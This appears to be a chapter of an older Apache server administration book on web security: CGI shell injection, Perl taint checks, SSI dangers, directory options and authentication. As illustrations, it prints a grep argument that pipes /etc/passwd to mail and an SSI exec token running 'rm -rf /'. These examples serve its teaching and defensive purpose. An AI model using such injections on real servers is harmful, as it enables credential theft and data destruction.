Bit Mode | Significance
4000 | Set user ID on execution
2000 | Set group ID on execution
1000 | Set sticky bit*
0400 | Read by owner
0200 | Write by owner
0100 | Execute (search in a directory) by owner
0040 | Read by group
0020 | Write by group
0010 | Execute (search in a directory) by group
0004 | Read by others
0002 | Write by others
0001 | Execute (search in a directory) by others
*When set on a directory, unprivileged users cannot delete or rename files belonging to other users in that directory.
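These bit values are additive. As a quick illustration, here is how you might set a file's mode from Perl (a sketch; the script name is hypothetical, and the leading zero matters because the mode is octal):
# 0400+0200+0100 (owner rwx) + 0040+0010 (group r-x) + 0004+0001 (others r-x)
chmod 0755, "myscript.cgi" or die "chmod failed: $!";
# Adding the 4000 bit (chmod 04755, ...) would also set the setuid bit.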
The main problem with CGIs is passing user-supplied variables to an exec() or system() call. If not carefully screened, these variables could contain shell metacharacters that cause the shell to do something other than what was intended.
Suppose you have a simple script that uses the UNIX utility grep to search the contents of a phone database. The user enters a first or last name, and the script returns any matching items. The script does most of its work with a call like this (note that Perl has much better, built-in ways of doing this):
system("grep $pattern database");
The $pattern variable is set from the user's form input. Now see what would happen if the user entered a line like the following:
"-v ffffffff /etc/passwd |mail someAddress"
This effectively sends your /etc/passwd file via e-mail to someAddress. The shell sees the pipe and runs grep -v ffffffff /etc/passwd |mail someAddress database. The -v argument tells grep to output all lines that don't match, and the pattern ffffffff almost certainly won't match anyone, so the entire password file is piped to mail.
The real solution to this type of problem involves several measures. One easy one is to make the call to system() a little differently:
system("/bin/grep", $pattern, "database");
When system() is given a list, the command is executed directly, without a shell; with no shell to interpret the pipe, it cannot do something you didn't want. Alternatively, you could escape each special shell character before passing the pattern to the grep call, as these lines of Perl show:
$pattern =~ s/(\W)/\\$1/g;
system("grep \"$pattern\" database");
Perl has built-in checks for shell metacharacters and other expressions that could spell trouble. To enable this feature, just start your Perl scripts with #!/usr/local/bin/perl -T.
This enables Perl's taint checks. Data that comes from outside the program (environment variables, the standard input stream, or program arguments) cannot be used in eval(), exec(), system(), or piped open() calls. Any program variable that obtains a value from one of these sources also becomes tainted and cannot be used either. To use a tainted variable, you must first untaint it, which requires performing a pattern match on the tainted variable and extracting the matched substrings. To untaint an e-mail address, use code like the following:
$email =~ /([\w.-]+\@[\w.-]+)/;
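Note that the untainted data is the captured substring, not the original variable, so assign the capture back before using it. A slightly fuller sketch (the variable name is illustrative):
if ($email =~ /^([\w.-]+\@[\w.-]+)$/) {
    $email = $1;    # the capture is untainted and safe to use
} else {
    die "Address contains unexpected characters";
}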
Server Parsed HTML (SPML), also known as Server Side Includes (SSI), provides a convenient way of performing server-side processing on an HTML file before it is sent to the client. This lets you introduce some dynamic features without having to program a CGI to provide the functionality.
SPML documents are processed by the server before they are sent to the client. Only documents with a MIME type of text/x-server-parsed-html or text/x-server-parsed-html3 are parsed. The resulting HTML is given the MIME type text/html and is sent back to the client.
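You typically tell the server which files to parse by mapping a file extension to this MIME type in the configuration. A common convention (the .shtml extension is only a convention) is:
AddType text/x-server-parsed-html .shtml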
SPML can include information such as the current time, execute a program, or include another document, all through special SPML commands added to your HTML page. When the HTML page is properly identified to the server as containing SPML tokens, the server parses the file and sends the results to the requesting client. While this seems rather innocuous, it isn't: SSIs are parsed like a script and can be a source of grief.
File inclusion is not usually a problem, as long as users are not including sensitive files such as /etc/passwd. The condition to watch for is SSI built from data provided by a user over the Web. Suppose you created a bulletin board SSI that includes items added by external users via a CGI. If your CGI is not smart enough to check what it is being handed, a user could add something nasty such as <!--#exec cmd="/bin/rm -rf /" -->. This, as you guessed, would attempt to remove all the files on your disk. Obviously, the example is intended as an illustration.
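A minimal defense, assuming the user's text arrives in a variable called $item (a hypothetical name), is to neutralize anything that looks like an SSI token before writing it into the page. This sketch simply escapes the markup so it displays as text:
$item =~ s/&/&amp;/g;    # escape & first, so the entities below aren't doubled
$item =~ s/</&lt;/g;     # with no "<" left, no <!--#exec ...--> token survives
$item =~ s/>/&gt;/g;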
Exercising security on your Web site means enforcing policies. If you happen to allow per-directory access files, in a way you have relinquished some control over the implementation of that policy. From an administrative point of view, it is much better to manage one global access file (conf/access.conf) with many different entries than a minimal global configuration file plus hundreds of per-directory access files.
Per-directory access files also have the terrible side effect of slowing down your server considerably: once enabled, the server must scan every directory in the path to a requested file for an access file, and each one it finds must be parsed to determine which options apply and in what order. This takes time.
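If you don't need per-directory files at all, you can say so explicitly in the global configuration so the server never looks for them. A sketch, placed in conf/access.conf:
<Directory />
AllowOverride None
</Directory>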
Permissions are specified in <Directory> sections in the global access control file or on a per-directory basis with .htaccess files. The Options directive specifies what server options are enabled for that particular server domain. Here are some of the options:
All | Enables all options except MultiViews.
ExecCGI | Enables the execution of CGI programs.
FollowSymLinks | Enables the traversing of symbolic links.
Includes | Enables the use of SSI.
IncludesNOEXEC | Enables the use of SSI, but the #exec command is disabled and #include cannot be used to run CGI programs.
Indexes | Enables the return of a server-generated directory listing for requests where there is no DirectoryIndex file (such as index.html).
MultiViews | Enables content negotiation based on document language. See the LanguagePriority directive in Chapter 10, "Apache Modules."
SymLinksIfOwnerMatch | Enables the traversing of symbolic links only if the target file or directory is owned by the same user as the link. This setting offers better security than FollowSymLinks.
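For example, a cautious <Directory> entry for a user-maintained tree might enable only the safer options (the path is hypothetical):
<Directory /usr/local/etc/httpd/htdocs/users>
Options Indexes IncludesNOEXEC SymLinksIfOwnerMatch
</Directory>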
The following is a list of the security issues raised by the Options directive. Relevance to your particular application depends on what type of site you manage.
On my site, the option to run CGIs from a directory other than cgi-bin doesn't pose many security risks because I control all the CGI programs on the server. However, if you have a melange of users, permitting execution of CGIs from anywhere may be too permissive and is asking for trouble.
The FollowSymLinks option is another one to worry about. If a user is able to create a link to a directory from inside your Web document tree, she's just created an alternative way of navigating into the rest of your filesystem. You can consider this option an easy way to publish your entire disk to the world. The SymLinksIfOwnerMatch option mitigates this risk a bit. However, both of these options are dangerous if you don't run a tight ship.
Includes allows the execution of SSI in the directory. This option can be tamed by specifying the IncludesNOEXEC option instead, which disables the #exec command and prevents #include from being used to execute programs from within an include statement.
The Indexes feature can also be abused easily, and it goes hand-in-hand with the FollowSymLinks issue just discussed. When a user travels to a directory that doesn't contain a user-generated index file, the server generates one if automatic indexing is enabled. This provides a complete listing of the files in that directory and a convenient interface for retrieving them.
Apache provides you with several methods of authenticating users before you grant them access to your materials, and third-party modules provide support for an even greater number. You can authenticate using cookies, SQL databases, flat files, and so on. You can also control access to your machine based on the IP address of the host requesting the documents. None of these methods provides a good measure of security by itself; used together, however, they are much more robust.
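As a sketch of how the two can be combined (the paths and domain are hypothetical), a <Directory> section can require both a recognized host and a valid user:
<Directory /usr/local/etc/httpd/htdocs/private>
AuthType Basic
AuthName PrivateArea
AuthUserFile /usr/local/etc/httpd/conf/.htpasswd
require valid-user
order deny,allow
deny from all
allow from .trusted-domain.com
</Directory>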
There are a few issues that should be mentioned before you rely on any of these methods.
Although looking at a machine's address to determine whether it is a friendly computer is better than not doing it, any host can be spoofed. Evildoers on the Net can configure their computers to pretend to be someone you know, usually by making the real host unavailable and then feeding the Domain Name System (DNS) the wrong information. For your security, you may want to enable -DMAXIMUM_DNS while compiling the server software (under Apache 1.1 there's a new directive, HostnameLookups, that does the same thing at runtime). This demands a little more work from your computer because DNS information is verified more closely. Typically, the server does a reverse lookup on the IP address of a client to get its name. Setting up HostnameLookups forces one more test: after the name is received, the server queries DNS for that name's IP address. If the two match, things are cool; otherwise, the access fails.
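The double-reverse check itself is straightforward. Here is a minimal Perl sketch of the idea (the client address is made up):
use Socket;
my $ip = "192.168.1.50";                              # hypothetical client address
my $name = gethostbyaddr(inet_aton($ip), AF_INET);    # reverse lookup: IP -> name
defined $name or die "no reverse mapping\n";
my @entry = gethostbyname($name);                     # forward lookup: name -> IPs
my @addrs = @entry[4 .. $#entry];                     # packed addresses start at index 4
my $ok = grep { inet_ntoa($_) eq $ip } @addrs;        # do forward and reverse agree?
print $ok ? "address verified\n" : "possible spoof\n";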
One problem with login and password verification over the Web is that an evildoer can have a ball trying to crack a password. On many UNIX systems, if you tried this on a user account, the system would eventually disable access to the account, making it more difficult to break in. On the Web, you could try a few hundred passwords in a few seconds (with a little software) without anyone noticing. This might seem to endanger only the private information behind that one password, until you consider that most users use the same password for most services.
Basic authentication is basic in that information exchanged between the browser and the server is not encrypted in any way; the authentication session is merely encoded (using Base64), not encrypted. Anyone who can intercept your authentication session can decode it and use the information to access your materials. The browser sends the authentication information with each request to the protected realm, which means that your login and password are sent not once, but many times over the wire.
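To see just how thin this protection is, here is all it takes to recover a login and password from a captured Authorization header (a sketch using the standard MIME::Base64 module; the credentials are made up):
use MIME::Base64;
my $header = "Basic dXNlcjpzZWNyZXQ=";    # a captured Authorization header value
(my $encoded = $header) =~ s/^Basic\s+//; # strip the scheme name
print decode_base64($encoded), "\n";      # prints "user:secret"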
To resolve this problem, a new method has been introduced: Digest authentication. Unlike Basic, Digest never sends the password itself; instead, the browser sends an MD5 digest derived from the password that is valid only for the requested resource. If someone captured the authentication information and was able to decode it, it would only be useful for retrieving that one resource. Access to each page requires a new digest, which the browser generates. This makes the entire process a bit more secure.
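The scheme is easy to picture with the Digest::MD5 module. This is only a rough sketch of the idea (the realm, nonce, and credentials are made up, and real exchanges carry more fields):
use Digest::MD5 qw(md5_hex);
my $ha1 = md5_hex("user:PrivateArea:secret");        # covers the credentials
my $ha2 = md5_hex("GET:/private/report.html");       # covers the specific request
my $response = md5_hex("$ha1:serverNonce123:$ha2");  # mixed with the server's nonce
print "$response\n";   # this value is useless for any other resource or session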
If you want truly secure access to your server and you don't want to send passwords in the clear, the only currently viable solution is to use an SSL server, such as Stronghold or Apache SSL. Chapter 14, "Secure Web Servers," goes into great detail about these products. An SSL server ensures that information sent between the browser and the server is kept confidential, so even if someone is spying on the line, it is very difficult to recover the original information. Secure transactions also ensure that the data you receive originated from a trusted point.
One way of reducing the likelihood of a problem is to reduce the number of potential sources of problems; in practice, that means reducing the amount of software that could be subverted in an unexpected way. Your server should be as light as possible in the software department.
If you don't do much else about security, the least you can do is frequently read the newsgroup comp.security.announce. This Usenet group carries posts from the Computer Emergency Response Team (CERT), which lists security holes as they are found. The CERT home page (see Figure 16.1) can be found at http://www.cert.org.
Figure 16.1. The CERT Coordination Center's home page.
In addition to CERT advisories, you may want to check Internet Security Systems, Inc.'s home page (see Figure 16.2), located at http://www.iss.net. Its Web site offers a nice mailing list and a vulnerability database that groups known security problems by program. Naturally, there's an entry for Apache too.
Figure 16.2. Internet Security Systems, Inc.'s home page.
There are many excellent books available that will provide more detail than you'll probably ever need. Here are a few:
UNIX Security for the Organization, by Richard Bryant, Sams Publishing.
Internet Firewalls and Network Security, by Karanjit Siyan, Ph.D. and Chris Hare, New Riders Publishing.
Building Internet Firewalls, by D. Brent Chapman and Elizabeth D. Zwicky, O'Reilly & Associates, Inc.
Practical UNIX Security, by Simson Garfinkel and Gene Spafford, O'Reilly & Associates, Inc.
The issues raised in this chapter only begin to address a few of the many configuration issues that may affect the security of your site. Security is a very complex subject. Because of UNIX and the networking necessary to make a Web server work, your task is a complicated one. I hope some of these warnings will point you in the right direction. And yes, while some of the examples are extreme, they were meant to catch your attention. The truth is that you really cannot be sure of what can be done. Expect the unexpected, and prepare for disaster. That way, should you be unfortunate enough to suffer a security breach, you'll be prepared to deal with it from a practical, as well as an emotional, point of view.
Document any security problems you find; if you think something is not right, write it down. If you shut down your system, the intruder will know she's been discovered, and it will be very difficult for you to track her. If, on the other hand, you wait and document, you may have a better chance of catching her and finding out her true identity.